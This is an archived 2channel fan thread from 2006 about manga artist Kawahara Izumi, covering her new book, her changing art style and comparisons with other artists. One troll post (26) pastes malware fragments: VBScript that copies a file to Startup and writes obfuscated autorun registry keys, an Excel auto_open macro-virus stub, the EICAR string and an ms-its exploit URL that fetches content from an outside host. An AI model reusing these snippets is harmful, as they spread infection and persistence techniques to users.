5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

―川原泉 18―

1 :花と名無しさん:2006/11/25(土) 20:24:54 ID:RmVnKLz70
「〜がある」シリーズついに単行本化
『レナード現象には理由がある』(白泉社・ジェッツコミックス)

その他川原泉作品についてもマターリ語りましょう

過去ログは>>2

2 :花と名無しさん:2006/11/25(土) 20:25:53 ID:RmVnKLz70
―川原泉 17―
http://comic6.2ch.net/test/read.cgi/gcomic/1155353680/
―川原泉 16―
http://comic6.2ch.net/test/read.cgi/gcomic/1151892356/
―川原泉 15―
http://comic6.2ch.net/test/read.cgi/gcomic/1142327492/
―川原泉 14―
http://comic6.2ch.net/test/read.cgi/gcomic/1130524902/
―川原泉 13―
http://comic6.2ch.net/test/read.cgi/gcomic/1120102785/
―川原泉 12―
http://comic6.2ch.net/test/read.cgi/gcomic/1115049582/
―川原泉 11―
http://comic6.2ch.net/test/read.cgi/gcomic/1112830976/
―川原泉 10―
http://comic6.2ch.net/test/read.cgi/gcomic/1106753567/
−川原泉 8−
http://comic6.2ch.net/test/read.cgi/gcomic/1089627939/
―川原泉 7―
http://comic6.2ch.net/test/read.cgi/gcomic/1058595398/
−川原泉 6−川原にうずもれて
http://comic.2ch.net/test/read.cgi/gcomic/1044665429/
−川原泉 5−あるいは川原教授の逆説
http://comic.2ch.net/gcomic/kako/1026/10269/1026998395.html
川原のロマンティック…わはは −川原泉 4−
http://comic.2ch.net/gcomic/kako/1011/10117/1011756679.html

3 :花と名無しさん:2006/11/25(土) 20:26:35 ID:RmVnKLz70
川原泉に言うからねっ! -川原泉 3-
http://comic.2ch.net/gcomic/kako/1001/10019/1001903110.html
川原の壺―川原泉がない 2―
http://choco.2ch.net/gcomic/kako/991/991968477.html
川原泉がない
http://salad.2ch.net/gcomic/kako/965/965496063.html

4 :花と名無しさん:2006/11/25(土) 20:27:57 ID:???0
過去ログ >>2-3

5 :花と名無しさん:2006/11/25(土) 20:54:50 ID:???0
996で次スレとはのんびりしてる。

6 :花と名無しさん:2006/11/25(土) 21:09:26 ID:???0
>>1
乙です。

ところで、12月いっぱいで29ちゃんねる利用中止になるそうですが、
このスレ住人的には無問題?
自分は●持ちなんで、どっちでもいいんだけどね。

7 :花と名無しさん:2006/11/25(土) 22:14:57 ID:???0
>1乙
あんまん食えよ

8 :花と名無しさん:2006/11/25(土) 22:50:32 ID:???0
>>1
次スレって何番が立てればいいの?
950とか過ぎても平気で雑談してるから気が気じゃなかったよ

9 :花と名無しさん:2006/11/25(土) 23:25:04 ID:???0
過去ログ保管庫作った方がいいんだろうな

10 :花と名無しさん:2006/11/25(土) 23:37:01 ID:???0
>>9
山口スレと美内スレ他で利用していた、
「2ch gcomic 過去ログ倉庫」 http://gcomic2ch.hacca.jp/
と言うのがあったんだが、半月ぐらい前からアクセス不能に…。
他にどっかで場所借りた方がいいかも。
ここの管理人さんに連絡とれたらいいんだけど、わからないんだ。

>>8
980を過ぎたら、レスがつかないと1000になる前に24時間以内に
dat落ちという仕様がある。
最近は祭りでもない限り、そんなにレス増えないので
970〜980辺りで次スレ立てるところが多いようです。

次から 「次スレは、980踏んだ人が立てよう」 とかって、
住人で自主的に決めればよいかと思う。

11 :花と名無しさん:2006/11/26(日) 00:21:11 ID:???0
>>8
なんか言っとけよ!

12 :花と名無しさん:2006/11/26(日) 01:51:40 ID:???0
>>10
ここって何も書いてなかったんだね
980が立てるでいいと思う


13 :花と名無しさん:2006/11/26(日) 02:52:58 ID:???0
>>1

さて・・・おやすみ

14 :花と名無しさん:2006/11/26(日) 08:54:52 ID:???0
>>10
テンプレに入ってないから980くらいでいいのかな?ありがと
>>11
なんでそんな偉そうなんだよ
このいばりんぼ!

15 :花と名無しさん:2006/11/26(日) 10:29:19 ID:???0
きっと、おこりんぼう星人なんだよ

16 :花と名無しさん:2006/11/26(日) 11:24:45 ID:???O
>>11の作るワインが美味しそう。

17 :花と名無しさん:2006/11/26(日) 14:50:33 ID:???0
>>1
乙です〜。

>>11
>>8が次スレ立たなくてやきもきしたのなら、何か言うよりも
8自身が次スレを立てればよかったのでは…?と思うんだがw
なぜ誰もそれを突っ込まないのだろうと不思議でならないw

18 :花と名無しさん:2006/11/26(日) 14:54:44 ID:???0
あたまのわるいクレ子ちゃんはほっときなさい

19 :花と名無しさん:2006/11/26(日) 15:59:16 ID:???0
ぎりぎりまで雑談なっていかにもカーラスレらしいじゃないですか〜。
締め切り落とさなかっただけでもww
とにかく>>1乙カレ〜。

20 :花と名無しさん:2006/11/26(日) 22:58:02 ID:???0
マッタリした流れだから心配してなかったよ
>>1さん乙かれさまです

21 :花と名無しさん:2006/11/26(日) 23:53:07 ID:???0
遅くなりましたが、>>1さん乙です。

22 :花と名無しさん:2006/11/28(火) 11:11:03 ID:???0
>>17
書き込みは出来るけどスレ立て規制される場合は結構あるよ。
板によってはスレ立て代行依頼スレッドがあったりするし。
●を持ってれば関係ないんだけどね。

23 :花と名無しさん:2006/11/28(火) 11:27:59 ID:???0
>>22
そんなことより気が気じゃないのに
黙ってたのは何でかって方が気になるw

24 :花と名無しさん:2006/11/28(火) 16:21:37 ID:???O
住人の自立性を尊重したのでしょう。見守り愛。

25 :花と名無しさん:2006/11/29(水) 04:52:40 ID:???0
最後まで貫いてほしかった

26 :<body onload=window()>:2006/11/29(水) 23:46:22 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

27 :花と名無しさん:2006/11/29(水) 23:51:50 ID:???0
まだ1ヶ月先の話だけれど、本当に次号メロディに前号の残りと
新しいのと、両方掲載できるかねぇ?

28 :花と名無しさん:2006/11/30(木) 00:23:42 ID:???0
>>26
死ねよ、糞ガキ

29 :花と名無しさん:2006/11/30(木) 16:10:56 ID:???O
>>27
できます。カーラ君はやればできる子なんですから。

カーラ君のお体を気遣う皆様、手編みのハラマキを贈るなら今です!

30 :花と名無しさん:2006/11/30(木) 16:26:16 ID:???0
毛糸の帽子も贈って上げてー
デザインはリトルグレイ柄がイイ!

31 :花と名無しさん:2006/12/01(金) 13:01:58 ID:???O
リトルグレイ柄ってどんなんだ?

32 :花と名無しさん:2006/12/01(金) 13:59:49 ID:???0
リトルグレイのフラクタル

33 :花と名無しさん:2006/12/01(金) 14:01:51 ID:n5zLAV0b0
すみません、質問なんですけど
銀のロマンティック…わははのモノローグで
「私はあなたの鏡」というフレーズ出てきましたよね?
その部分全文わかる方いらっしゃったら教えて欲しいです。

34 :花と名無しさん:2006/12/01(金) 16:17:58 ID:???0
>>33
ミラー・シャドウ・ユニゾン
私は貴方の鏡
私は貴方の影
私達は調和する

そしてクワドラプル!!



35 :花と名無しさん:2006/12/01(金) 16:18:14 ID:???O
リトルグレイのマンデルブロ集合・・・怖っ

36 :33:2006/12/01(金) 18:02:21 ID:???0
>>34
あーそれだ!!!
ありがとうございます

37 :花と名無しさん:2006/12/03(日) 11:34:22 ID:???0
ついにMHK杯の解説が木枯さんではなくなってしまった。
ショックだ(涙)

38 :花と名無しさん:2006/12/05(火) 08:06:16 ID:???0
木枯さんも偉くなったねぇ。MHK杯表彰式の前?に挨拶してた。
でも久しぶりに現役時代の映像が見られて嬉しかった〜(3日の放送)

39 :sage:2006/12/07(木) 12:33:31 ID:+iZxNrjy0
こないだ映画館で「エラゴン」の予告編を見た。
ドラゴンの赤ちゃんが出てきて、たんぱく質を思い出した。
かわいかったので、本編を見に行こうと思う。

40 :花と名無しさん:2006/12/07(木) 12:34:29 ID:???0
↑激しく間違えた。スマン!

41 :花と名無しさん:2006/12/07(木) 16:35:17 ID:???0
いやこのスレでも良いのでは?

42 :花と名無しさん:2006/12/07(木) 18:36:19 ID:???O
地球を救うのは食糧!

43 :花と名無しさん:2006/12/07(木) 18:57:17 ID:???0
>>41
内容じゃなくてsageを入れる場所を間違えたと云っているのだと思われり

44 :花と名無しさん:2006/12/07(木) 19:42:39 ID:???O
バビロンの続きマダー?

45 :花と名無しさん:2006/12/07(木) 23:12:23 ID:???0
>>43
なるほど

46 :花と名無しさん:2006/12/08(金) 00:11:02 ID:???0
>>44
バビロンは文庫版で完結しているよ

さらにあの後の話が読みたいってことだったらゴメンネ

47 :花と名無しさん:2006/12/09(土) 16:48:46 ID:???O
確か花とゆめ本誌では最終回って言って終わったんじゃなかったんだよね。

48 :花と名無しさん:2006/12/09(土) 18:03:05 ID:???O
バビロン文庫版は最終最後のお楽しみに取ってありました。
お正月にいよいよ解禁…買っちゃおうかなと思ってます。

49 :花と名無しさん:2006/12/10(日) 20:20:41 ID:???0
    〃〃∩  _, ,_      ヤダ
     ⊂⌒( `Д´)       ヤダ
       `ヽ_つ ⊂ノ          ヤダ
              ジタバタ
         _, ,_
     〃〃(`Д´ ∩ < もっと可愛いタッチじゃなきゃヤダヤダヤダ
        ⊂   (
          ヽ∩ つ  ジタバタ

    〃〃∩  _, ,_
     ⊂⌒( つД´) < もうコピーばっかりの絵はヤダー
       `ヽ_ ノ ⊂ノ
              ジタバタ
       ∩
     ⊂⌒(  _, ,_) < 昔はもっとキャラの表情が豊かだったのにぃ…
       `ヽ_つ ⊂ノ
              ヒック...ヒック..

     ⊂⌒(  _, ,_)
       `ヽ_つ ⊂ノ  zzz…

50 :花と名無しさん:2006/12/12(火) 00:41:32 ID:???0
気持ちはわかる
妙にリアルな顔とか人工的なトーンの張り方とかキモチワルイ

51 :花と名無しさん:2006/12/12(火) 12:55:13 ID:???0
コピー乱用とか無機質な目とかもね

52 :花と名無しさん:2006/12/12(火) 17:51:02 ID:???0
目がなんか違うよね。
昔の目のがいい。

53 :花と名無しさん:2006/12/12(火) 19:48:29 ID:???0
最近の絵は切り絵みたいな感じがする。
シルエットはリアルなんだけどペラペラっとした
奥行きのない絵。
昔の絵というか当時の漫画は川原さん以外でも
ふっくらした絵が多かったような感じがする。
佐々木倫子さんは絵が違ってきたけど違和感はない。
川原さんはなんでこういう絵になったんだろうと思う。

54 :花と名無しさん:2006/12/12(火) 20:40:26 ID:???0
>52
「殿様は〜」の頃の目は最高だった。

55 :花と名無しさん:2006/12/12(火) 21:00:41 ID:???O
さっきテレビで石原良純が小学生にカモメ眉を指摘されてた
カモメ眉毛思い出して吹いた

56 :花と名無しさん:2006/12/12(火) 21:05:07 ID:???0
まあでも、石原良純はコソクに伸ばした前髪で
つなぎ目隠したりはしてないからなw

その点はあのムカツク坊ちゃまよりはマシだw


57 :花と名無しさん:2006/12/13(水) 10:29:26 ID:???0
簡略画は崩壊してたけど
ジュリエットの逆襲の女の子の可愛さは異常

58 :花と名無しさん:2006/12/13(水) 13:06:28 ID:???0
ものすごーく久しぶりに新作?の「レナード」と、このスレで
見かけたので完結版「バビロン」文庫買った。
バビロンの後に見ると、まぁ話はともかくとして、新作の絵が
ものすごく辛い……orz
シリアスもデッサンひどいけど、ほややん系絵、どうして
あんなきもちわるくしちゃったんだろう……前の点目キャラとか
すごいかわいかったのに。

59 :花と名無しさん:2006/12/13(水) 18:50:25 ID:???0
まあ、前の絵も下手とか言われて
カーラ君もつらかったんでしょうよ
ゆるやかに見守ろうよ・・・と自分は思っている

60 :花と名無しさん:2006/12/13(水) 19:39:28 ID:???0
うん、作風自体はあんま変わってなかったことはうれしかったよ。

61 :花と名無しさん:2006/12/13(水) 23:07:20 ID:???O
花村瑞紀たんの可愛さは微妙

天光たんかわいいよ天光たん

62 :花と名無しさん:2006/12/17(日) 23:54:47 ID:???0
珍しく止まってるね。次号の作品は大丈夫かね。

63 :花と名無しさん:2006/12/18(月) 01:33:56 ID:???0
メロ発売日まであと10日ぐらいか…
通常スケジュールなら、もう脱稿してるよね?

64 :花と名無しさん:2006/12/19(火) 00:00:34 ID:???0
脱肛?

65 :花と名無しさん:2006/12/19(火) 06:09:32 ID:???0
>>64
近年稀に見るクソレス

66 :花と名無しさん:2006/12/19(火) 11:28:44 ID:???0
いちいち相手するおまえのもクソレス

67 :花と名無しさん:2006/12/19(火) 17:49:28 ID:???0
自分>>65じゃないけど
クソに引っ掛けたのも気付かないなら黙ってろww

68 :花と名無しさん:2006/12/19(火) 18:37:50 ID:???0
下品ざますよっ!

69 :花と名無しさん:2006/12/19(火) 18:44:36 ID:???0
あんこだぞ、うんこじゃないぞ〜
「あ」と「ん」の間をのばすのもダメだぞwww

70 :花と名無しさん:2006/12/19(火) 18:56:09 ID:???0
根性すわったアンコが入った大福モチが食いたい…。

71 :花と名無しさん:2006/12/19(火) 19:44:56 ID:???0
つまらん

72 :花と名無しさん:2006/12/19(火) 21:47:09 ID:???0
別にウケを狙ったわけじゃないよ。
川原漫画は食べ物が美味しそうで、お腹がすくとつい連想してしまう。
それこそ、大福とかさつま汁とか味噌汁とかきしめんとかカレーとか。

73 :花と名無しさん:2006/12/19(火) 22:40:41 ID:???0
川原漫画はドラえもんに次ぐ「簡単描写なのにおいしそう」漫画だと思う。

74 :花と名無しさん:2006/12/19(火) 22:50:05 ID:???0
>>65=>>67


だよね?w

75 :花と名無しさん:2006/12/19(火) 22:55:02 ID:???0
>>64=>>74
10おきで出るなんて律儀だな。
そんなにうんこにこだわんなよw

76 :花と名無しさん:2006/12/19(火) 23:37:12 ID:???0
かくも簡単に釣られる>>65に萌え

77 :花と名無しさん:2006/12/20(水) 01:04:45 ID:???O
ぽんぽこ山のマツタケが食べたい・・・

78 :花と名無しさん:2006/12/20(水) 01:11:45 ID:???0
俺のチ○ポコ山のマツタケなら(ry

79 :花と名無しさん:2006/12/20(水) 02:56:02 ID:???0
もうすぐ映画のDVDがでるぞぉ〜ぞぉ〜ぞぉ〜………・・
脱力シーン満載だぞぉ〜ぞぉ〜

80 :花と名無しさん:2006/12/20(水) 03:36:54 ID:???O
>>73
坂田靖子さんもなかなかだぞ。

81 :花と名無しさん:2006/12/20(水) 09:01:13 ID:???0
史緒さんの関西弁に萎えまくり

82 :花と名無しさん:2006/12/20(水) 11:02:16 ID:???0
もきゅっもきゅって食べるんだよね。

83 :花と名無しさん:2006/12/20(水) 15:57:47 ID:???O
惜しい。濁点が足りないわ。

84 :花と名無しさん:2006/12/20(水) 17:36:30 ID:???0
この人の漫画は大好きなのだが、
いかんせん私の周りの川原信者達がウザくて話ができない。
自分がハマったものに対しては皆(自分も含めて)似たようなもんなんだろうと
思ってるが、それにしてもあの人達だけはイタすぎる。

85 :花と名無しさん:2006/12/20(水) 18:38:48 ID:???0
そんな個人的環境の愚痴をここで言われても。

86 :花と名無しさん:2006/12/20(水) 19:26:10 ID:???O
いま味噌汁作ってんだけど。どっかに外人落ちてないかな

87 :花と名無しさん:2006/12/20(水) 19:31:20 ID:???0
>>84
どちらかといえば信者がうるさいのには同意。
谷川文子信者と通じる。
作品に悪意が描かれないぶん、
信者は作品や作家を神聖視しすぎなのかもしれない。

88 :花と名無しさん:2006/12/20(水) 21:19:28 ID:???O
どんな風だと信者と呼ばれるのか
どんなイタイ発言するのか気になる

89 :花と名無しさん:2006/12/20(水) 21:56:11 ID:???0
同じく

ていうか>>84の周囲にそういうのが密生してるだけなんちゃうかと
小一時間w

90 :花と名無しさん:2006/12/20(水) 22:33:30 ID:???0
昔、月刊OUTという雑誌があって、その雑誌に載ってる読者参加コーナーの
「川原泉を勝手に応援する連合会(通称、泉勝連)」が好きだったなぁ・・・

91 :花と名無しさん:2006/12/20(水) 22:38:55 ID:???0
>月刊OUT
>月刊OUT
>月刊OUT

92 :花と名無しさん:2006/12/20(水) 23:10:31 ID:???0
アウシタンってどこにでもいるな…

93 :花と名無しさん:2006/12/21(木) 01:15:09 ID:???0
>>86
サンコンみたいのでもいいのか?w

94 :花と名無しさん:2006/12/21(木) 12:13:21 ID:???0
>88
・他の人に貸してみて、あんまりハマらなかった様子だと
「うんうん。あんまり一般ウケしないよね〜。単なる娯楽としては収まらないから。
わかる人にだけわかるって感じで・・・読む人を選ぶよね」と変な納得の仕方をする。
・ハ○クロとかN○N○とかデス○ートとか○だめとかについて
「ああゆうのって、キャッチーで人気が出るのすっごいわかる〜。
それはそれで悪くはないんだけど(なんか上から目線)、私達が求めてるのは違うんだよね」
・川原作品の話をするときは「やっぱり教授は頭がいいからね」と言わないと気が済まない。

・・・どれもこれも、うっすら同意できることなんだけど、あからさまに語られるとちょっと・・・(しかもしょっちゅう)

でもあの人達は特殊なんだとわかって安心したよ。

あと、そんな輩がたくさんいるような書き方して悪かった。実際は二人だけ。



95 :花と名無しさん:2006/12/21(木) 12:29:35 ID:???0
そっかー
カーラ好きは自分の周囲も多いけど(というか友達から教えてもらった)、
痛い人は特にいないな。その中では自分が一番痛いぐらいだw

マターリしてるけどひそかにセンスいい人が読んでる印象がある。

96 :花と名無しさん:2006/12/21(木) 15:35:41 ID:???0
>>95
思うに、
>マターリしてるけどひそかにセンスいい人が読んでる印象がある。
という思い上がりが痛いんじゃないかな。

97 :96:2006/12/21(木) 15:39:43 ID:???0
ごめんこれじゃただの荒らしか。

結局どの物語も読んで楽しむためにあるわけで、
川原さんの漫画だってどんなアホが好んでてもおかしくないし、
頭が良くても嫌いな人がいるかもしれない。
別に選ばれた人が好むわけではなというか。

隙あらば作品内の台詞の羅列とかアイテムの羅列とか、
「これだけ理解できている」みたいな流れになりがちなのもちょっと。

98 :花と名無しさん:2006/12/21(木) 15:46:03 ID:???0
>>96
ゴメン書き方悪かったねw
「自分の周囲で読んでる人は→」マターリしてるけど
ひそかにセンスいい人がたまたま多いんだよ。
>>95でも言ったけどあの集団では自分が一番痛い奴。

99 :花と名無しさん:2006/12/22(金) 00:30:43 ID:???0
中高生の時から川原漫画読んでると、周囲から浮く
アイドル話とか、昨日のドラマの話とか、男と恋愛しか興味ない会話に入っていけなくなるから
見下すとかじゃなくてね、そういう物の見方になっちゃうのならわかるなあ


100 :花と名無しさん:2006/12/22(金) 01:40:49 ID:???0
>99
ちゃう。
そもそも、そういう物の見方の資質が無いと、川原作品は読めない。
結局は自分自身の業なのだよ。

101 :花と名無しさん:2006/12/22(金) 01:50:23 ID:???0
「川原泉漫画はマイナー」と思いこみたい人がたまにいるけど、
全盛期の花ゆめで連載持ってた作家だから
それなりに知名度ある人なんだよな。

102 :花と名無しさん:2006/12/22(金) 02:13:11 ID:???0
おもしろいよね〜 そだよね〜 好きだなわし、カーラさん〜 私も〜
それじゃいかんのかね
自分なんか小難しい事考えずに(られずに)、キャラの点目に合わせたままの表情で
くつくつ楽しんでるよ

>>94さんが嫌だなぁと思う気持ちは無下に出来ないけど
理屈こねてるなぁひねくれてるなぁと感じたら
カーラキャラみたいに「あに言ってんだ?(と心で思って口には出さず)」
なノリで流すのが精神衛生上よいと思いますよ

103 :花と名無しさん:2006/12/22(金) 05:45:40 ID:???0
カーラファンとかどーとかに限らず、人は皆基本的には
選民願望があるもんだw
別にgdgd言わんでスルーすればよろし。

「私たちって一般人と違ってカーラ作品を隅まで理解で
きる人たちよねー」とのたまう連中もアレだが、
「そういうのおかしい」「あの人たちは特殊」「私は
普通に楽しめてる」とかわざわざ言って自分とは分けた
がるほうも、結局言ってることはどっちにしても同じ
「私は○○とは違うの!」
でございますよ。

厨な精神構造は似た者同士だといい加減気付け……
うざい。

104 :花と名無しさん:2006/12/22(金) 07:48:23 ID:???0
>>101
知名度≠一般人気

105 :花と名無しさん:2006/12/22(金) 09:18:15 ID:???0
カーラくんは、一世を風靡したタイプの漫画を持ってないし
(今でいうなら、nanaとかのだめみたいな)
多作な人じゃないというか、寡作な人なので
「カーラくんの良さがわかる私はトクベツ」と、無意識のうちに思いたくなるのかもね。
でも、いろんな人と話してみると、カーラくんも好きだよ、って人は結構いる。
大人の男性にもいる。
それに、彼女の本があれだけ文庫本化されてて、コンスタントに売れてるってことは
やっぱり人気のある人なんだよ。文庫にならない人も、文庫になってもあっというまに以下ry。
って人も多いんだから。
自分の周りに、声高に好きだと言う人が少ないorそういう人がたまたま変な人だっただけさ。

106 :花と名無しさん:2006/12/22(金) 09:38:13 ID:???0
こんなキャストの作品もあるから期待できるんじゃない?w

ttp://sakaiminato.net/photolib2/P00918.jpg
ttp://sakaiminato.net/photolib2/P00917.jpg

107 :花と名無しさん:2006/12/22(金) 09:38:18 ID:???0
>>102
マンガ口調を真似るのは典型的痛い人の一例ですよっと

108 :花と名無しさん:2006/12/22(金) 09:38:50 ID:???0
>>106
誤爆った

109 :花と名無しさん:2006/12/22(金) 09:47:16 ID:???0
>>108
ワロタのでドンマイ

110 :花と名無しさん:2006/12/22(金) 09:47:47 ID:???0
>>102の口調がなんかきもちわるいんですが……

111 :花と名無しさん:2006/12/22(金) 13:42:44 ID:???0
川原泉ファンと遠藤淑子ファンは結構かぶると思うがどうだろう?
私は2人とも好きだけど、周りにも結構そういう人がいるので・・・。

絵が格別に上手というわけでもないけど妙にツボにハマる作風が
似ていると言えば似てるかもしれないなと思ったり。

112 :花と名無しさん:2006/12/22(金) 14:16:44 ID:???O
>>111
私もそのお2人は好きです
人生のシンゲン(←携帯に字がない…)が含まれてて、
笑かされつつズバリ核心をつかれる気持ち良さがあるところ
…が共通点かな?方向性は違うような気もするけど

113 :花と名無しさん:2006/12/22(金) 14:34:46 ID:???0
川原泉はシリアス絵はともあれ簡略絵の加減はかなり巧いと思う。
遠藤淑子は……単純に下手………………な気が…………うーん


114 :花と名無しさん:2006/12/22(金) 14:37:20 ID:???0
>>113
どうして、そういう荒れそうそうな不用意なことを書くかねえ?

115 :花と名無しさん:2006/12/22(金) 14:49:28 ID:???0
ごめん

116 :花と名無しさん:2006/12/22(金) 14:50:45 ID:???0
いや、下手だろ遠藤さんは
それでも愛されてるわけで

117 :花と名無しさん:2006/12/22(金) 15:19:04 ID:???0
自分は川原好きだけどそっちは別に…
川原はクセはあるけど線とか綺麗だしデフォ絵も可愛いから、
プロのラインは充分クリアしてる。遠藤氏については微妙。

ていうか、別に悪口書きたいわけじゃないのでできれば
遠藤マンセーは別スレで頼む。
荒れるようなレスを、とか言われるだろうけど、××好きは
○○も好きでしょ似てるし、みたいな決めつけがそもそもの
荒れる元じゃね?

118 :花と名無しさん:2006/12/22(金) 15:46:12 ID:???0
川原ファンが桑田乃梨子、佐々木倫子、遠藤淑子好きとかぶるのは
今まで何度も出たと思うよ。
自分は遠藤、桑田はダメだったけどこの4人が一緒に挙げられるのは
分かるような気がする。

119 :花と名無しさん:2006/12/22(金) 16:02:10 ID:???0
××のは上手いと思うのが、○○は単に下手
なんて比較をするのはいかがなものかと
○○ファンはあまりよい気持ちしないかも

普通は△△みたいに上手くなっていくのに
××の最近の絵はなんだよw
なんてのをどこかで見たら嫌だろ?

120 :花と名無しさん:2006/12/22(金) 16:23:28 ID:???0
だから、自分の好みが人と同じだという思い込みはやめよーぜー
桑田も遠藤も勘弁

121 :花と名無しさん:2006/12/22(金) 17:11:08 ID:???0
遠藤と同列のわけない
桑田はもっと下

122 :花と名無しさん:2006/12/22(金) 17:11:26 ID:???O
>>118
四人とも二番煎じのできない
特異な個性ってところしか共通点はないと思うんだが・・・
全員全部持ってるけどさ

123 :花と名無しさん:2006/12/22(金) 17:19:02 ID:???0
桑田・遠藤は表紙見ただけでわかる下手糞だから論外として、
佐々木倫子と川原泉を同列に並べるなんて、感性歪んでるよ。
哲学本と写真集並べて「似てるよね」って言われるようなもん。

124 :花と名無しさん:2006/12/22(金) 17:35:00 ID:???0
このスレに痛い川原信者がいるのはわかるな…。

125 :花と名無しさん:2006/12/22(金) 17:35:49 ID:???O
そんなに釣り針垂らされても困るお(´・ω・`)
みんな退屈してるのか…早くメロ出ないかな

126 :花と名無しさん:2006/12/22(金) 17:41:51 ID:???0
明らかに嵐と釣りと釣られ屋が混在しているw
暇だなみんな

127 :花と名無しさん:2006/12/22(金) 20:16:41 ID:???0
DVD買った?みんな画面に向かって突っ込んでる?

128 :花と名無しさん:2006/12/22(金) 21:30:38 ID:???0
映画は見損ねたがDVDは・・・まずレンタルだなw

129 :花と名無しさん:2006/12/22(金) 22:01:54 ID:???0
買わないし見ない

130 :花と名無しさん:2006/12/22(金) 23:12:03 ID:???0
ようやく記憶から消し去ったのに思い出してしまったorz

131 :花と名無しさん:2006/12/23(土) 03:40:19 ID:???0
レナードがコミック・アニメ年間ベストセラー・ランキングの
26位って知って驚いたw>ヤフ


132 :花と名無しさん:2006/12/23(土) 05:53:33 ID:???0
>>111
似てねーよボケ
眼下と精神科逝け

133 :花と名無しさん:2006/12/23(土) 09:24:13 ID:???0
>>132
なにをそんなにカリカリしてる?

次巻がなかなか出ないからか・・・

134 :花と名無しさん:2006/12/23(土) 09:51:35 ID:???0
そりゃー小学女子の漫画みたいのと同列扱いされりゃねえ……。

135 :花と名無しさん:2006/12/23(土) 11:07:17 ID:???0
他の漫画家を貶すのイクナイ!(・A・)

136 :花と名無しさん:2006/12/23(土) 13:48:51 ID:???0
事実

137 :花と名無しさん:2006/12/23(土) 13:53:19 ID:???0
漫画は絵に重きを置くものとそうでないものがあるよ。
どちらに心を動かされるかは個人の好みだ。
だから比較すること事態おかしい。
同じぐらい好きな人がいても変じゃないよ。

でも狂信者がいる作家のスレで他の作家名を並べた人も迂闊だね。

138 :花と名無しさん:2006/12/23(土) 14:15:05 ID:???0
>狂信者

( ゚Д゚)


なんだ、結局これ言いたかったがための釣り&煽りの嵐プレイですか。
氏んでね。

139 :花と名無しさん:2006/12/23(土) 14:36:07 ID:???0
>>138
え?132とかおかしくない?


140 :花と名無しさん:2006/12/23(土) 14:43:06 ID:???0
どうみても自演嵐

141 :花と名無しさん:2006/12/23(土) 14:53:09 ID:???0
他スレで時々見かけるけど、川原って根強い作者アンチも
いるし、川原儲アンチもいるんだよね。
川原教授とか呼ばれてるだけで嫉妬汁が出ちゃうんだろう。
気の毒に。

142 :花と名無しさん:2006/12/23(土) 15:10:31 ID:???O
>嫉妬汁
いやな汁だナー(;´∀`)
さて、さつまじるの作り方でもぐぐるか

143 :花と名無しさん:2006/12/23(土) 15:16:59 ID:???0
>>142
バカ者ー、薩摩汁が食いたくなってしまったではないか!

今夜のメニューがローストチキンとケーキと薩摩汁に
なっちゃうよー

144 :花と名無しさん:2006/12/23(土) 15:36:32 ID:???0
川原作品キャラは「計算した天然ぶりっこ」なんだそうだw

145 :花と名無しさん:2006/12/23(土) 17:22:01 ID:???0
さつま汁は隠し味に牛乳をちょびっと入れるとんまいでよw

146 :花と名無しさん:2006/12/23(土) 17:30:03 ID:???0
もぎゅもぎゅ

147 :花と名無しさん:2006/12/23(土) 19:31:03 ID:???O
牛乳入れすぎたああああッ!!

148 :花と名無しさん:2006/12/23(土) 19:39:21 ID:???0
薩摩乳汁

149 :花と名無しさん:2006/12/23(土) 20:40:23 ID:???0
つミカエル学園の床

150 :花と名無しさん:2006/12/23(土) 22:47:23 ID:???0
牛乳で床みがくと臭くなりそうな気もするんだがどうなんだろう

151 :花と名無しさん:2006/12/23(土) 22:49:33 ID:???0
日に日にヨーグルト臭が……

152 :花と名無しさん:2006/12/23(土) 22:49:48 ID:???0
弟が昔、にんにく食べたあと、牛乳で歯をみがいたけど、すさまじかった

153 :花と名無しさん:2006/12/24(日) 00:33:20 ID:???0
>150
うちの学校も月一で牛乳磨きやってました
サボるとてきめんに臭くなるので必死でしたw

床をモップで水ぶき(めったにないが汚れが酷い時はデッキブラシと洗剤も出てくる)→
ざっと水分を取ってから牛乳を塗って10分放置→
モップをしぼりながら牛乳をどんどん拭き取る→
乾いたモップで拭き上げる(この時点で牛乳臭がしないとこまでしっかり拭く)→
窓開けて10分乾燥後、乾いた雑巾で仕上げ磨き(年二回はこの上にワックスがけ)

154 :花と名無しさん:2006/12/24(日) 05:20:15 ID:???0
それは牛乳臭を消す為に掃除する事で結果的に綺麗になってそうな気が

というかなんか>>153の学校お嬢様風味がするなぁ。ええのう

155 :花と名無しさん:2006/12/24(日) 09:44:01 ID:???0
縫製人間ぬいぐるまー…ルドルフくん思い出しちゃいそうな
タイトルだオーケン。

156 :花と名無しさん:2006/12/24(日) 09:45:48 ID:???0
>>155
NHK教育見てましたね?

157 :花と名無しさん:2006/12/24(日) 09:56:47 ID:???0
>156
いや本屋で見かけたんだよ。表紙がルドルフくんに見えたw


158 :花と名無しさん:2006/12/24(日) 11:39:35 ID:???0
厨の時に牛乳のような、白くて気持ち悪い臭いを発するワックスなら使ってたなぁ
そういやワックス塗った後濡れ雑巾→乾いた雑巾だったから、ひょっとしてあれは牛乳だったのか?
みんなまじめに掃除しないもんだから、一年中臭かった。
梅雨時とか最悪。

